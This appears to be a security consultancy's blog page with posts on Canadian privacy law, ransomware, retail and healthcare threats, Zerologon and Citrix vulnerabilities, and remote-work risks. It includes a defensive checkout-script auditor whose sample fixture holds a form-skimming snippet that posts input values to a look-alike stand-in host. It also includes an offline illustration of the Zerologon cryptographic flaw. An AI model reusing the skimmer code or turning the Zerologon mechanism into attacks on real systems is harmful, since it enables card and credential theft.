Thought leadership, threat analysis, news and alerts.
Canada’s Proposed Privacy Law Aims to Impose Stronger Fine of Up to 5% of Global Revenue or $25 Million
The federal government of Canada, through the Office of the Minister of Innovation, Science and Industry, has proposed a new private-sector privacy law that would impose far larger fines on organizations that are remiss in protecting the privacy of Canadians.
The proposed law, the Consumer Privacy Protection Act (CPPA), would be enacted through the Digital Charter Implementation Act, 2020. It would allow administrative monetary penalties of up to 3% of global revenue or $10 million, whichever is higher, for non-compliant organizations, and fines for certain serious offences under the Act of up to 5% of global revenue or $25 million, whichever is higher.
Section 57, paragraph 3 of the Digital Charter Implementation Act, 2020 states that “security safeguards must protect personal information against, among other things, loss, theft and unauthorized access, disclosure, copying, use and modification.”
"The COVID-19 pandemic has accelerated the digital transformation, which is changing how Canadians work, access information, access services, and connect with their loved ones,” said Navdeep Bains, Minister of Innovation, Science, and Industry. “This transformation is making concerns about privacy, and how companies handle Canadians’ data, more important than ever. As Canadians increasingly rely on technology, we need a system where they know how their data is used and where they have control over how it is handled.”
Right to be Forgotten
The new proposed privacy law has its own version of the principle of "Right to be Forgotten." This right, also known as the right to erasure, gives individuals the right to ask organizations to delete their personal data.
The Digital Charter Implementation Act, 2020 gives Canadians the ability to demand that their personal information held by organizations, including social media platforms, be permanently deleted when consent is withdrawn or when the information is no longer necessary for the purpose it was collected for.
Canada’s Major Data Breach
In November 2019, LifeLabs, Canada’s largest provider of general diagnostic and specialty laboratory testing services, informed the Office of the Information and Privacy Commissioner of Ontario (IPC) and the Office of the Information and Privacy Commissioner for British Columbia (OIPC) that cybercriminals gained entry into the company’s systems, extracted data and demanded a ransom. LifeLabs informed the IPC and OIPC that the data breach affected systems that contained information of approximately 15 million LifeLabs customers (nearly half of Canada’s total population), including names, physical addresses, email addresses, customer usernames and passwords, health card numbers, and lab tests. The vast majority of these affected customers are from British Columbia and Ontario.
A joint investigation conducted by IPC and OIPC found that LifeLabs failed to protect the personal information of millions of Canadians resulting in a significant data breach in 2019. According to the two offices, LifeLabs failed to take the following reasonable steps:
The Office of the Information and Privacy Commissioner of Ontario and the Office of the Information and Privacy Commissioner for British Columbia both ordered LifeLabs to implement a number of cybersecurity measures to address the company’s shortcomings. Despite their findings, however, the two offices didn’t impose financial penalties on LifeLabs, because neither office had the legal authority to do so.
“LifeLabs exposed British Columbians, along with millions of other Canadians, to potential identity theft, financial loss, and reputational harm,” said Michael McEvoy, Information and Privacy Commissioner of British Columbia. “This investigation also reinforces the need for changes to BC’s laws that allow regulators to consider imposing financial penalties on companies that violate people’s privacy rights. This is the very kind of case where my office would have considered levying penalties.”
In a separate statement, LifeLabs said that as a result of the cyberattack, it took several measures, including retrieving the data by “making a payment.” The company, however, didn’t mention how much it paid to the attackers.
The company also didn’t mention ransomware. While the LifeLabs cyberattack has the markings of a ransomware attack, it hasn’t been confirmed as one.
Traditionally, ransomware encrypts victims’ files, locking the victims out of them, and the attackers then demand a ransom in exchange for the decryption keys. Most of today’s ransomware operators also steal data before encrypting it and demand a second payment in exchange for not publishing what they stole.
Personal Health Information Protection Act (PHIPA)
On March 25, 2020, the Ontario government amended the Personal Health Information Protection Act (PHIPA), Ontario’s health privacy law. Once the accompanying regulations are in force, Ontario will be the first Canadian province whose privacy regulator can levy administrative monetary penalties on individuals and companies that contravene its health privacy law.
The amendment doubles the maximum fines for an offence to $200,000 for individuals and $1,000,000 for organizations, and adds the possibility of imprisonment of up to one year for an individual convicted of an offence.
“Perhaps most significantly, once regulations are in place, my office [Information and Privacy Commissioner of Ontario] will be given the power to levy monetary penalties against those who contravene our health privacy law, including for breaches, such as those resulting from abandoned records,” said Brian Beamish, Information and Privacy Commissioner of Ontario. “Privacy commissioners across the country have been calling for the power to impose administrative penalties, and Ontario will be the first to enshrine it into legislation.”
How to prevent ransomware attacks: Best practices guide
Ransomware attacks are becoming common. The city of Saint John in New Brunswick recently fell victim to a ransomware attack.
What Is Ransomware Attack?
A ransomware attack is a cyberattack in which victims’ files are encrypted and held for ransom: the attacker promises that, in exchange for payment, the key or keys that unlock the files will be released.
Payment is no guarantee that your organization will get its files back; some decryptors supplied by attackers don’t work, whether by design or because of bugs. Today’s ransomware operators commonly demand two payments: one for the decryption key, and a second to stop them from publishing the data they stole before encrypting it. That second demand shows that modern ransomware operators don’t just lock victims’ files; they exfiltrate data first.
City of Saint John Ransomware Attack
A few weeks ago, the city of Saint John in New Brunswick fell victim to a ransomware attack. On November 17, Don Darling, Mayor of Saint John, confirmed that the city’s IT systems had been hit by ransomware.
To protect the city’s IT systems, the Mayor said, the city’s website, servers and email system were taken offline. Due to the nature of the attack, he said, the city would not comment on the ransom demand. City manager John Collin said that, as of November 17, there was no indication that personal information had been accessed or exfiltrated.
Weeks after the attack, the city manager said that departmental phone lines, email for most city hall employees and online payments were still unavailable. Taking the systems offline, he said, was an "immediate and proactive" response to contain the attack. "Our network will be back online only once we are sure that it is safe to do so," he said.
The city hasn’t disclosed how the attacker or attackers initially compromised its IT systems.
Exposure via Third-Party Software
The recent ransomware attack on the city of Saint John isn’t the first time that the city fell victim to a cyberattack.
In December 2018, Stas Alforov, director of research and development at Gemini Advisory, said the firm had discovered nearly 300,000 payment records in underground marketplaces that specialize in selling compromised payment card data. The records, he said, were stolen from 46 confirmed compromised locations in the US and one in Canada, with roughly 6,000 of the records coming from the Canadian location: the city of Saint John.
Alforov said the nearly 300,000 records were part of a larger operation by the same hacking group. Analysis of the card data suggested the records had been stolen from municipal services that used Click2Gov, payment software used mainly by local governments to collect payments such as utility bills and fines.
Saint John used Click2Gov to take parking ticket payments through the city’s website. Alforov told HuffPost Canada that the city called him after his report was published; it hadn’t been aware of the breach. He added that the city’s parking ticket payment system appeared to have been breached as far back as September 2017.
To date, there’s no information on whether the past data breach on the city of Saint John’s parking ticket system is related to the recent ransomware attack.
Other ransomware victims, such as the city of Keene, Texas, were able to link a compromised third-party provider to the resulting ransomware attack. In August 2019, Keene Mayor Gary Heinrich told NPR that the attackers had compromised the software the city used, which was managed by a third-party company. The same provider served close to two dozen local governments in Texas that were hit in the same coordinated ransomware attack.
"They got into our software provider, the guys who run our IT systems," Heinrich said. "Well, just about everything we do at City Hall is impacted.”
The attack on the Texas local governments, including Keene, illustrates one gateway through which ransomware operators gain initial access: the third-party software and managed service providers their victims depend on.
Cybersecurity Best Practices
Here are some of the best cybersecurity practices against ransomware attacks:
Properly Vet Third-Party Software
Third-party software, whose source code your organization doesn’t control, should be vetted for security before it is deployed: ask the vendor how the product and its support channel are authenticated and updated, limit the access it is granted to your network to what it actually needs, and follow the vendor’s security advisories so you learn about a breach from them rather than from a researcher. The Click2Gov and Texas incidents above show that a provider’s compromise becomes your compromise.
Keep All Software Up to Date
Apply software updates (patches) released by vendors promptly. Patches carry not only feature upgrades but also fixes for known security vulnerabilities.
Ransomware operators routinely gain initial access by exploiting a known vulnerability for which the vendor has already shipped a patch that the victim has not yet applied.
Practice the 3-2-1 Backup Rule
The 3-2-1 backup rule is your organization’s best defence against the first type of ransom demand, the demand to unlock files. It states that you should keep three copies of your data, on two different types of media, with one copy stored offsite. Because modern ransomware deliberately seeks out and encrypts or deletes any backups it can reach, at least one copy should also be offline or immutable, and restores should be tested regularly so you know the backups actually work before you need them.
Backups are not, however, an answer to the second type of demand: the threat to publish stolen data.
When you need help, our team of cybersecurity and IT experts is a phone call away. Connect with us today, and take a proactive approach to cybersecurity.
Upcoming Holiday Shopping Season Brings New Level of Cybercrime Threats to Online Retailers
Online shopping this holiday season is projected to be unprecedented, with many people staying at home and opting to shop online as a result of the COVID-19 mandatory lockdown or due to self-imposed lockdown.
The expected online shopping surge creates a perfect stage for cybercrimes.
Shift to Online Shopping
Statistics Canada reported that from February 2020 to May 2020, retail e-commerce sales soared by 99.3%. The record gain in e-commerce, however, came alongside a record decline in total retail sales.
Statistics Canada reported that for the same period, the total retail sales fell by 17.9%. The impact of COVID-19, Statistics Canada said, is best highlighted using the April 2020 data, with a 26.4% decline in retail sales compared to the April 2019 data.
A Deloitte survey found that 47% of Canadian consumers said they had been shopping online more often since the COVID-19 crisis began, and the same share (47%) said they would likely look online for gifts and other items this holiday season, with the remaining 53% intending to shop in traditional retail stores. Although those planning to shop in stores still slightly outnumber those planning to shop online, the shift is significant: in the 2019 holiday season, 69% of holiday shoppers shopped in physical stores.
“A lot has changed since the 2019 outlook,” Deloitte said. “COVID-19 has changed how Canadians live, work, and shop, and it has turbocharged the fundamental shifts in consumer behaviour that were already underway.”
Imperva, meanwhile, reported that from March 1 to March 22, 2020, retail website traffic worldwide soared by as much as 28% on a weekly average.
Holiday Season Cybercrime Threats
A new Imperva report says the upcoming holiday shopping season will bring online retailers record traffic and, with it, a level of cybercrime threats not seen before. According to Imperva, online retailers face the following threats this holiday season:
Bad Bots Attacks
According to Imperva, bad bots as a group are a top threat to online retailers, both before and during the pandemic. A bot is a software application that runs automated tasks over the internet.
As opposed to a good bot, which automates tasks for legitimate purposes (a search engine crawler, for example), a bad bot is operated for malicious ends. Bad bots interact with applications much as legitimate users would, which makes them hard to distinguish from real users.
An example of a bad bot is one that hammers a website’s login form, attempting to brute-force its way in by trying username and password combinations until one works. Beyond brute-force attacks, bad bots are used for competitive data scraping, harvesting personal and financial data, and more.
API Attacks
According to Imperva, retailers’ APIs are attractive targets because of the sensitive payment data behind them, and the volume of attacks on retail APIs this year far exceeded average levels.
An API (application programming interface) is a software intermediary that lets applications communicate with one another. A retail site’s web APIs, for example, are what its front end and mobile apps call to reach back-end services such as inventory, customer and payment systems, which is why an attacker who can call them directly bypasses whatever protections exist only in the web page.
DDoS Attacks
According to Imperva, retail sites experienced an average of eight application-layer DDoS attacks a month, with a significant spike in April 2020 as lockdowns drove demand for online shopping. A DDoS (distributed denial of service) attack attempts to make an online service, such as a website, unavailable to legitimate users.
DDoS attacks use bad bots: hijacked computers organized into a botnet that the attackers control to carry out malicious activities. An application-layer DDoS attack, unlike a volumetric flood, sends requests that look legitimate but are chosen to exhaust the application’s resources (CPU, database connections, expensive searches) until the web server falls over. Because the requests resemble real traffic, they are harder to filter than a bandwidth flood.
Client-Side Attacks
According to Imperva, retail sites are vulnerable to client-side attacks because many are built on frameworks that pull in a great deal of third-party code. Client-side refers to anything that is rendered or executed in the end user’s browser, including the checkout form the user sees and the scripts that run on it.
The attack on Ticketmaster is an example. In June 2018, Ticketmaster disclosed that it had been compromised and that attackers had stolen customer information. RiskIQ, which discovered the attack, reported that Ticketmaster itself wasn’t directly compromised; its third-party supplier Inbenta was, and the attackers added to or replaced the Inbenta code that Ticketmaster’s site loaded with a malicious version.
A client-side attack can also come from a compromise of the website itself, as in the British Airways attack, which RiskIQ also discovered.
According to RiskIQ, malicious code was found on British Airways’ baggage claim page, where customers entered personally identifiable information. The code sent the entered data to a URL that looked like it belonged to British Airways but, on closer inspection, was not owned by the airline.
It’s still unknown how the malicious code got into the British Airways’ site in the first place.
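The two incidents above share a pattern: script the browser trusts is swapped or modified, and the captured form data goes to a domain the site never used. The following is an added example, not code from the page, RiskIQ, Ticketmaster or British Airways, of the inventory check a retailer can run against its own checkout page. The HTML, the script bodies and the hostnames (`example-air.test`, `example-air-cdn.test`) are constructed placeholders, and the allowlist of script hosts is an assumption a real deployment would take from its own build manifest. It flags a script served from a host outside the allowlist (the Ticketmaster/Inbenta case), a first-party script served without Subresource Integrity so that a modified copy loads silently (the British Airways case), inline script that a strict Content-Security-Policy would block, and any URL in script text that points off the allowlist as a candidate exfiltration endpoint.

```python
"""Inventory the scripts a checkout page loads and flag client-side skimming risks."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Assumption: only these hosts may serve script to the checkout page (placeholder names).
ALLOWED_SCRIPT_HOSTS: Set[str] = {"www.example-air.test", "cdn.example-air.test"}
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a known-good script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


class ScriptCollector(HTMLParser):
    """Collects every <script> tag: its src, its integrity attribute and any inline body."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict[str, Optional[str]]] = []
        self._in_script = False
        self._chunks: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""})
            self._in_script, self._chunks = True, []

    def handle_data(self, data):
        if self._in_script:
            self._chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts[-1]["inline"] = "".join(self._chunks).strip()
            self._in_script = False


def audit_scripts(html: str, allowed_hosts: Set[str] = ALLOWED_SCRIPT_HOSTS,
                  fetched_bodies: Optional[Dict[str, str]] = None) -> List[str]:
    """Return findings as 'TYPE detail' strings.

    fetched_bodies maps an external script src to its body as a crawler captured it;
    here the bodies are supplied inline so the example runs offline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings: List[str] = []
    for s in collector.scripts:
        src, body = s["src"], s["inline"] or ""
        if src:
            host = urlparse(src).hostname
            if host and host not in allowed_hosts:
                findings.append(f"UNEXPECTED_HOST {host} {src}")
            if not s["integrity"]:  # without SRI a tampered copy loads without complaint
                findings.append(f"NO_SRI {src}")
            body = (fetched_bodies or {}).get(src, "")
        elif body:  # a strict CSP (no 'unsafe-inline') would refuse to run this
            findings.append("INLINE_SCRIPT " + body.splitlines()[0][:60])
        # any URL inside script text that points off the allowlist is a candidate exfil endpoint
        for host in URL_HOST_RE.findall(body):
            if host not in allowed_hosts:
                findings.append(f"EXFIL_CANDIDATE {host} in {src or 'inline script'}")
    return findings


def csp_script_src(allowed_hosts: Set[str]) -> str:
    """A Content-Security-Policy directive that blocks script from any other host and all inline script."""
    return "script-src 'self' " + " ".join(sorted(allowed_hosts)) + ";"


# ---- constructed sample: a checkout page with one tampered first-party script and one rogue host ----
GOOD_MODERNIZR = b"/* constructed stand-in for a vendored library build */"
TAMPERED_CHECKOUT_JS = """
window.addEventListener('submit', function () {
  var d = {}; document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  fetch('https://example-air-cdn.test/collect', {method: 'POST', body: JSON.stringify(d)});
});
"""
SAMPLE_CHECKOUT_HTML = f"""
<html><head>
<script src="https://cdn.example-air.test/js/modernizr.js" integrity="{sri_hash(GOOD_MODERNIZR)}"></script>
<script src="https://www.example-air.test/js/checkout.js"></script>
<script src="https://example-air-cdn.test/js/loader.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
</script>
</head><body><form id="payment"><input name="card"></form></body></html>
"""
SAMPLE_FETCHED = {"https://www.example-air.test/js/checkout.js": TAMPERED_CHECKOUT_JS}

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_HTML, fetched_bodies=SAMPLE_FETCHED):
        print(finding)
    print(csp_script_src(ALLOWED_SCRIPT_HOSTS))
```

Run on the constructed page, the audit reports the look-alike host `example-air-cdn.test` twice (once as an unexpected script source, once as the destination the tampered `checkout.js` posts form data to), two scripts without SRI, and the inline block. The `script-src` directive it prints would have stopped the rogue script from loading at all; SRI on first-party scripts is what catches the British Airways pattern, where the host is legitimate but the file has changed.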
Worried about your website or web application and looking to better protect it? Contact us today to see how to mitigate the risks quickly and efficiently.
Increased Cybercrime Threat to Canadian Healthcare Organizations
In recent months, threat actors have launched cyberattacks against organizations in the healthcare sector, including those based in Canada, according to the latest report released by Microsoft.
In the blog post "Cyberattacks targeting health care must stop," Tom Burt, Corporate Vice President for Customer Security and Trust at Microsoft, said that the targets include organizations in the health sector in Canada, France, India, South Korea and the United States. Burt identified three threat groups, which Microsoft tracks under the codenames Strontium, Zinc and Cerium.
According to Burt, Strontium uses password spray and brute force login attempts to steal login credentials. “These are attacks [password spray and brute force login attempts] that aim to break into people’s accounts using thousands or millions of rapid attempts,” Burt said.
Password spraying is an attack that tries a small number of common passwords against a large number of accounts, keeping the attempts per account low enough to stay under lockout thresholds. A brute-force attack, by contrast, tries many passwords against a single account until it guesses the correct one.
According to Burt, Zinc and Cerium use spear-phishing lures to steal credentials. Spear-phishing is an attack in which a threat actor, masquerading as a trusted individual or organization, tricks specific targeted individuals into opening a malicious link or attachment delivered by email, text message or instant message.
In the case of Zinc, Burt said, the lures were messages with fabricated job descriptions sent by attackers posing as recruiters, while Cerium used COVID-19-themed emails while masquerading as World Health Organization representatives.
Ransomware Attacks in the Healthcare Sector
The Canadian, Australian, U.S. and UK governments, meanwhile, issued separate alerts warning of increased ransomware activity targeting the healthcare sector. Ransomware is malicious software (malware) that encrypts victims’ files, locking the victims out of them.
In traditional ransomware attacks, the attackers demand a ransom in exchange for the keys that unlock the encrypted files. Modern-day ransomware operators not only demand a ransom to unlock the files; they also demand a ransom in exchange for not publishing the files they stole during the intrusion.
In September of this year, the University Hospital Düsseldorf in Germany reported a ransomware attack. The attack rendered 30 of the hospital’s servers inoperable, forcing it to turn away patients, even those with life-threatening conditions.
According to German authorities, a patient with a life-threatening condition was turned away, sent to another hospital some 20 miles away, and died; the case was widely reported as the first death linked to a cyberattack.
Threat Actors Tool Evolution
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) issued the alert “Ransomware Activity Targeting the Healthcare and Public Health Sector,” warning that threat actors targeting the U.S. healthcare sector use the malware called “BazarLoader,” often leading to ransomware attacks, data theft, and the disruption of healthcare services.
In a recent alert “Renewed Cyber Threats to Canadian Health Organizations,” the Canadian Centre for Cyber Security (Cyber Centre) said threat actors targeting the Canadian healthcare sector have been observed using the BazarLoader malware for initial compromise on victims’ networks for the eventual deployment of the ransomware called “Conti,” believed to be the successor of Ryuk ransomware. The Cyber Centre said that the BazarLoader malware is typically deployed via a phishing email.
Phishing in general has no particular target; it aims to victimize whoever takes the bait. Spear-phishing, by contrast, targets specific individuals or organizations.
BazarLoader, the Cyber Centre said, provides a backdoor through which additional malware is introduced to the victim’s network. Once inside, the malware called Anchor is used to maintain a presence on the network. Anchor is a framework of tools that covertly uploads further malicious tools and, once they have run, removes evidence of the activity.
The Australian Cyber Security Centre, meanwhile, issued its own alert "SDBBot Targeting Health Sector," warning that it has observed increased targeting activity against the Australian health sector by threat actors using the SDBBot Remote Access Tool for the eventual deployment of ransomware called “Clop.”
SDBBot has three components: 1) an installer that establishes persistence on the victim’s system; 2) a loader that downloads additional components; and 3) the remote access tool itself, which gives the threat actors full remote control of compromised computers. Once inside, the threat actors also use SDBBot to move laterally within the network and steal data.
Cybersecurity Best Practices
Below are some of the cybersecurity best practices to mitigate the risks:
Is your organization at risk? Let us help you evaluate your controls quickly and efficiently.
Email us today at firstname.lastname@example.org and sleep better at night knowing that your business is well protected against cybercriminals.
Canadian Centre for Cyber Security Warns About the Continued Exploitation of Multiple Vulnerabilities
The Government of Canada, through the Canadian Centre for Cyber Security, has warned that threat actors are exploiting multiple known vulnerabilities present in information systems in Canada.
According to the Canadian Centre for Cyber Security (Cyber Centre), information systems and the networks linking them are critical components of today’s interconnected world, relied upon by governments, small businesses and individuals alike, so securing them is of the utmost importance. The Cyber Centre’s warning echoes a U.S. National Security Agency (NSA) advisory that threat actors are targeting U.S. information systems such as unpatched remote access services, security appliances and application servers.
"The Cyber Centre continues to receive reports of persistent exploitation of known vulnerabilities," the Cyber Centre said. “While manufacturers work hard to provide updates for vulnerabilities, these updates are not always applied in a timely manner by consumers.”
Among the vulnerabilities that are being actively exploited by threat actors according to the Cyber Centre and NSA are the following:
Microsoft Netlogon Elevation of Privilege Vulnerability
This vulnerability, designated CVE-2020-1472 and commonly known as Zerologon, is described by Microsoft as an elevation of privilege vulnerability that exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC). Netlogon is the Windows component through which domain-joined machines and users authenticate to Active Directory domain controllers.
“By simply sending a number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in the AD [Active Directory],” Tom Tervoort, Senior Security Specialist at Secura and the one who discovered the Netlogon vulnerability, said in the whitepaper “ZeroLogon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472).” “It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain.”
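The reason all-zero messages work is a cryptographic one: MS-NRPC derives the 8-byte credential by encrypting the 8-byte challenge with AES-128 in CFB8 mode using an all-zero IV. The following is an added illustration of that flaw, not code from the page, from Secura or from Microsoft, and it never talks to a domain controller. CFB8 produces one output byte per block-cipher call, `c[i] = p[i] XOR E_k(register)[0]`, with the register starting as the IV and then shifting each ciphertext byte in. If the IV is zero, the challenge is zero and `E_k(0^16)[0]` happens to be 0 (about one key in 256), the first output byte is 0, the register stays all zeros, and every later byte is 0 as well, whatever the key. The key-derivation loop and the random session keys are constructed stand-ins for the real derivation from the machine account secret (which the attacker does not know, so each attempt faces an effectively fresh key); when the `cryptography` package is not installed the block uses a keyed-hash stand-in instead of AES, which preserves the property because CFB8 only ever uses the cipher as a keyed map of the register.

```python
"""Why all-zero Netlogon messages can authenticate: CFB8 with a zero IV."""
import hashlib
import random
from typing import Optional, Tuple

try:  # use real AES-128 when the 'cryptography' package is available
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()

    BLOCK_CIPHER = "AES-128"
except ImportError:  # stand-in keyed function (NOT AES); CFB8 behaves identically on top of it
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:16]

    BLOCK_CIPHER = "SHA-256 keyed stand-in (not AES)"


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8 mode over a 16-byte block function: one keystream byte per block call."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])  # shift the ciphertext byte into the register
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential, AES variant: CFB8 over the 8-byte challenge with IV = 0."""
    if len(challenge) != 8 or len(session_key) != 16:
        raise ValueError("challenge must be 8 bytes and session key 16 bytes")
    return cfb8_encrypt(session_key, bytes(16), challenge)


def derived_key(i: int) -> bytes:
    """Deterministic pseudo-random 16-byte key for the experiments (constructed input)."""
    return hashlib.sha256(b"zerologon-demo-key-" + str(i).encode()).digest()[:16]


def count_zero_credentials(n_keys: int) -> Tuple[int, int]:
    """How many of n_keys keys turn the all-zero challenge into an all-zero credential (expect ~1/256)."""
    hits = sum(1 for i in range(n_keys)
               if compute_netlogon_credential(derived_key(i), bytes(8)) == bytes(8))
    return hits, n_keys


def first_byte_explains_it(n_keys: int) -> bool:
    """Check the mechanism: credential == 0^8 exactly when E_k(0^16)[0] == 0."""
    for i in range(n_keys):
        key = derived_key(i)
        cred_zero = compute_netlogon_credential(key, bytes(8)) == bytes(8)
        first_byte_zero = block_encrypt(key, bytes(16))[0] == 0
        if cred_zero != first_byte_zero:
            return False
    return True


def simulate_zero_credential_attempts(max_attempts: int, seed: int = 2020) -> Optional[int]:
    """Model the server's check in the authenticate step.

    On each attempt the server holds a session key the attacker never learns
    (modelled as fresh random bytes) and compares the client credential against
    its own computation. The attacker always sends challenge = 0^8 and
    credential = 0^8. Returns the attempt on which the server accepts, or None."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        session_key = bytes(rng.getrandbits(8) for _ in range(16))
        if compute_netlogon_credential(session_key, bytes(8)) == bytes(8):
            return attempt
    return None


if __name__ == "__main__":
    hits, n = count_zero_credentials(8192)
    print(f"{BLOCK_CIPHER}: {hits} of {n} keys give an all-zero credential (expect about {n // 256})")
    print("credential is zero exactly when E_k(0)[0] == 0:", first_byte_explains_it(2048))
    print("zero credential accepted on attempt:", simulate_zero_credential_attempts(4096))
```

The simulation accepts the zero credential after a few hundred attempts on average, which is why the whitepaper describes the attack as simply retrying; the protocol had no rate limit on failed authentications, and the same flaw let the attacker drive the later password-change call with zeros as well. The fix Microsoft shipped does not change the cipher; it makes domain controllers require signed and sealed (secure RPC) Netlogon channels so the zero-credential handshake is rejected.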
Remote Code Execution Vulnerability Affecting Citrix Application Delivery Controller (ADC)
Citrix describes ADC as a networking appliance that “improve[s] the performance, security and resiliency of applications delivered over the web.” Designated CVE-2019-19781, this vulnerability, if exploited, lets an unauthenticated attacker achieve remote code execution, that is, run code of their choosing on the appliance over the network without any credentials.
In July of this year, the Canadian Centre for Cyber Security reported that several computer networks in Canada had been compromised and that, in each case, a threat actor was able to compromise internet-exposed infrastructure because the software running on an exposed server wasn’t patched to the latest version or the server wasn’t properly secured with two-factor authentication. According to the Cyber Centre, the successful compromise of vulnerable and improperly secured servers and network access devices is often preceded by intensive reconnaissance-style scanning of the target networks. In some cases malicious software (malware) was installed, and the compromised infrastructure may have been used in attempts to compromise other networks and organizations.
Cybersecurity Best Practices
While it’s important to keep all software and firmware up to date, this alone isn’t the whole solution in keeping your organization safe from attackers.
Rare Cases of Multiple Patches
Microsoft is addressing CVE-2020-1472 in two phases. The first update was released on August 11, 2020; the enforcement phase, in which domain controllers reject vulnerable Netlogon secure channel connections by default, is scheduled for the first quarter of 2021.
What should be done before the arrival of the second part of the patch? Aside from applying the August 11th patch, according to Microsoft, the following steps should be taken:
False Sense of Security
It’s important to note that patching alone doesn’t undo a network compromise that was achieved by exploiting the vulnerability. For instance, applying Citrix’s January 2020 patch for CVE-2019-19781 isn’t enough to clean up a network that was already compromised through it.
In July 2020, Fox-IT reported that back in January 2020, just a few days after the release of the CVE-2019-19781 patch, a total of 1,030 compromised servers were identified, including those owned by Governmental organizations and Fortune 500 companies.
“However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security,” Fox-IT said. “This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.”
CVE-2019-19781 also showed how attackers compete to keep the networks they’ve compromised to themselves, a so-called hacker turf war: some threat actors applied the CVE-2019-19781 patch themselves, after planting their own backdoor, to lock out rival attackers, a practice known as adversary patching.
If your organization failed to apply a critical patch in a timely manner, assume the attacker may already be inside: credentials, accounts and software may have been changed before the patch went on, and patching alone won’t remove them. Treat a late patch as the start of an incident investigation, not the end of one.
Shift to Remote Workforce: The Need for Remote IT Support
More than half a year into the pandemic, many have come to accept that office life as we know it is unlikely to come back – at least not for the foreseeable future.
As of September 2020, Statistics Canada reported that a large number of Canadians continued to adapt to COVID-19 by working remotely, with over twice as many people working from home (4.2 million) as usually did so before the pandemic (1.9 million). The work-from-home set-up, however, has opened up cybersecurity challenges that never existed with an office-based workforce, which in turn calls for remote IT support.
Cybersecurity Challenges with a Remote Workforce
Here are some of the cybersecurity challenges faced by organizations with remote workforce:
Patching
Patching is the application of a software update that fixes security vulnerabilities. When people still worked in the office, patching was straightforward: IT staff could walk over to the machines that needed it.
With a remote workforce, workers are at home, and patching their computers, especially when they’re using personal computers, is a challenge.
Timely patching matters because threat actors are quick to exploit unpatched systems. Microsoft, for instance, recently warned that threat actors are actively attempting to exploit the vulnerability in Windows Server designated CVE-2020-1472 and commonly called “Zerologon”.
Microsoft reported that, although it had released a patch for Zerologon on August 11, a surge in exploitation has been observed since September 13, following the publication of several proof-of-concept exploit tools. CVE-2020-1472 lets an unauthenticated attacker with network access to a domain controller reset the domain controller’s machine account password and from there take over the domain, effectively turning the attacker into a domain administrator. Active Directory is Microsoft’s proprietary directory service, through which IT administrators authenticate and manage the users and computers in a network.
According to Microsoft, prior to exploiting the Zerologon vulnerability, one attacker was observed exploiting the CVE-2019-0604 vulnerability in SharePoint to initially access Windows Server operating systems. Microsoft described this vulnerability as a remote code execution vulnerability that exists in Microsoft SharePoint when the software fails to “check the source markup of an application package”. An attacker who successfully exploits this vulnerability, Microsoft said, could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.
According to the Canadian Centre for Cyber Security, Canadian organizations are being exploited via unpatched devices and inadequate authentication. “In each case, a threat actor was able to compromise infrastructure exposed to the internet because it was not properly secured via 2FA and/or because software running on an exposed server was not patched to the latest version,” the Canadian Centre for Cyber Security said.
The work-from-home model forces many organizations to allow remote workers to access network resources remotely, opening up a plethora of cybersecurity vulnerabilities.
Remote Desktop Protocol (RDP)
One of the weakest links in allowing remote workers to access corporate networks is exposing Remote Desktop Protocol (RDP) to the internet. RDP is a proprietary protocol developed by Microsoft that allows a Windows user to connect to Windows workstations or servers over the internet.
Kaspersky Lab reported that since the start of the global pandemic in March of this year, brute force attacks against RDP have rocketed across almost the entire planet. A brute force attack uses a trial-and-error method in which an attacker tries as many username and password combinations as possible in the hope of guessing the correct one.
“The lockdown has seen the appearance of a great many computers and servers able to be connected remotely, and right now we are witnessing an increase in cybercriminal activity with a view to exploiting the situation to attack corporate resources that have now been made available (sometimes in a hurry) to remote workers,” Kaspersky Lab said.
“Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections,” Microsoft said. “Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.”
